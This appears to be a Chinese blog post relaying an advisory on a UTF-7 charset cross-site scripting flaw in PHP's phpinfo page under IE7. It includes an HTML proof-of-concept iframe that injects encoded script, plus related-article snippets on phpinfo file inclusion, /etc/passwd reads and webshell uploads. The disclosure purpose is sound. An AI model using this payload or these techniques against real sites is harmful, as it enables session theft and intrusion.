phpinfo跨站脚本漏洞

最新推荐文章于 2024-05-14 03:37:45 发布
最新推荐文章于 2024-05-14 03:37:45 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: ‖漏 洞 公 布‖ 文章标签: 脚本 iframe 浏览器 ie php html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackiis/article/details/2914209
版权
 洞成因: phpinfo页面对输入的参数都做了详细的过滤,但是没有对输出的进行charset的指定,而在一些浏览器里如IE7里,你可以让它自动选择编码或者通过一个iframe页面给它指定编码,这样就可以饶过phpinfo的过滤而产生一个跨站脚本漏洞。

漏洞来源: http://www.80sec.com/release/phpinfo-xss.txt

漏洞利用: 利用代码如下:

<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
<body>
<iframe src="http://www.80sec.com/phpinfo.php?+ADw-SCRIPT+AD4-alert(document.domain);+ADw-/SCRIPT+AD4-=1">

以上代码在IE7+php 5.2.6测试成功。phpinfo页面的xss甚至比其他页面更加危险,因为如果有phpinfo的存在,恶意攻击者可以利用phpinfo的输出bypass如httponly和一些基础认证。

漏洞影响: 影响所有版本的php和浏览器IE7
漏洞修补: 建议暂时删除站点的phpinfo页面避免被人利用。
hackiis
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpinfo.php ctf,这你不是你所常见的PHP文件包含漏洞(利用phpinfo
weixin_29352517的博客
03-10 864
0x01 前言看到文件包含(+phpinfo ) 的问题,在上次众测中出现此题目,如果没打过CTF,可能真的很少见到这种问题,当然作为小白的我,也是很少遇到,毕竟都是第一次,那就来总结一波经验和操作,附赠EXP,借鉴网上大佬环境,进一步进行探索。0x02 漏洞环境执行如下命令启动环境:docker-compose up -d目标环境是官方最新版PHP7.2,说明该漏洞与PHP版本无关。环境启动后,...
TOP10漏洞之文件包含
weixin_44255856的博客
12-09 1119
前沿 很早之前就学习了top10的漏洞,但是对于我自己来说基本上就大体的过来一遍,有一句话就是学习好基础,让你少奋斗两年, 于是我现在又来过一遍top10漏洞。在这些中主要侧重于我自己的思路。 ##文件包含含义: 文件包含在我的理解来说就是程序员在自己写代码是要调用其他的文件,使用包含文件的函数。在我们耳中关于文件包含漏洞的存在基本在php,但是在jsp, asp中同样也存在文件包含。 于是在这篇...
信息泄露(目录遍历,phpinfo,备份文件下载)_phpinfo信息泄露漏洞(1)
最新发布
2401_84972844的博客
05-14 827
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
PHP文件包含漏洞(利用phpinfo
Li-D的博客
12-31 8501
漏洞描述 文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 PHP中引发文件包含漏洞的通常是以下四个函数: 1、include()当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、include_once()功能和include()相同,区别在于当重复调用同一文件时,程序只调用一次。 3、require()只要程序一执行就
phpinfo_scanner-master.zip
04-19
4. **运行扫描**:找到工具的主脚本(可能是`scanner.py`或其他类似名称的文件),并根据文档或工具内的提示运行扫描。 5. **查看结果**:扫描完成后,工具应提供一个报告,列出所有发现的`phpinfo()`页面及其对应的...
第26天:WEB漏洞-XSS之订单及Shell箱子反杀记1
08-03
**XSS脚本攻击详解** XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取Cookie、操纵页面内容,甚至进行更复杂的攻击。...
PHP3 safe_mode 失效漏洞
12-17
phpinfo(); ?> ``` 这段代码展示了如何利用`popen()`来执行不受限制的命令,例如列出`/opt/bin`目录的内容并执行`id`命令来获取当前用户的权限信息。如果`safe_mode`生效,这样的操作应该是被禁止的。但是,当运行...
测试脚本注入.docx
09-06
- **脚本攻击(XSS)**:攻击者可以通过在用户浏览器中执行恶意脚本来攻击其他用户。 - **权限提升**:通过脚本注入,攻击者可能获得更高的系统权限。 6. **防御策略** 防止脚本注入的关键在于正确处理用户...
你不知道的文件上传漏洞php代码分析
12-18
如果没有适当的验证,恶意用户可以上传含有恶意代码的文件,例如PHP脚本,这可能导致远程代码执行。例如,一个恶意用户可能上传一个名为`shell.php`的文件,其内容如下: ```php ($_GET['command']);?> ``` 然后,...
PHPInfo()信息泄漏漏洞利用及提权
热门推荐
weixin_44023460的博客
12-08 3万+
Simeon PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 1.1phpinfo函数 PHP中提供了PHPInfo()函数,该函数返...
PHP文件包含漏洞(利用phpinfo)复现&&文件上传(条件竞争)
sinat_61654365的博客
01-11 1840
在 PHP 环境下,如果网存在本地文件包含漏洞,但是却无法找到想要包含的文件,也无法生成和上传文件,是否能够获得 WebShell 呢?这里有一个技巧,前提是网需要有一个 phpinf 页面,就可以通过条件竞争来包含缓存文件获取 WebShell了。这个技巧实际上融合了PHIP 文件包含信息泄露条件竞争这三种漏洞,下面简述一下这种技巧的原理。
php通用漏洞phpinfo,php文件包含漏洞(利用phpinfo)复现
weixin_39574555的博客
03-11 430
利用docker复现该漏洞,访问http://192.168.80.156:8080/phpinfo.php,可以看到页面出现phpinfo页面再访问http://192.168.80.156:8080/lfi.php?file=/etc/passwd,可以看到该页面是存在文件包含漏洞的。先讲一下利用phpinfo上传文件,然后在文件包含的原理:参考链接:https://github.com/vu...
phpinfo漏洞信息利用
墨痕诉清风的博客
10-10 7507
libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理,会导致XXE。向phpinfo()页面post一个shell(自己写一个上传页面),可以在_FILES[“file1”]中看到上传的临时文件,如果有个lfi,便可以直接getshell了。php标签有4种形式,如果这个选项不开启的话(一般默认不开启),使用asp的标签是不会解析的。还是标签的问题,允许这种形式,并且
PHP phpinfo.php 信息泄露
(ง •_•)ง
11-25 2306
phpinfo可能会泄露项目php版本和服务器变量等信息,安全起见我们需要禁用phpinfo函数,那我们该如何禁用phpinfo函数呢?首先打开php.ini,找到“disable_functions”,没有则新增,修改成以下: disable_functions =phpinfo disable_functions是禁用php函数,多个函数英文逗号分隔禁用: disable_functions...
PHP文件包含漏洞(利用phpinfo)复现
m0_52701599的博客
03-05 1553
PHP文件包含漏洞(利用phpinfo)复现
vulhub PHP文件包含漏洞(利用phpinfo)复现
weixin_53696027的博客
03-04 830
通过docker搭建vulhub靶场来利用php文件包含漏洞
php文件包含漏洞(利用phpinfo
06-28
对于php文件包含漏洞,攻击者可以利用phpinfo函数来获取大量有关Web服务器和PHP配置的信息。如果攻击者可以获取此信息,他们将更容易地了解Web服务器的配置和缺陷,从而定向和更容易地入侵目标系统。例如,攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值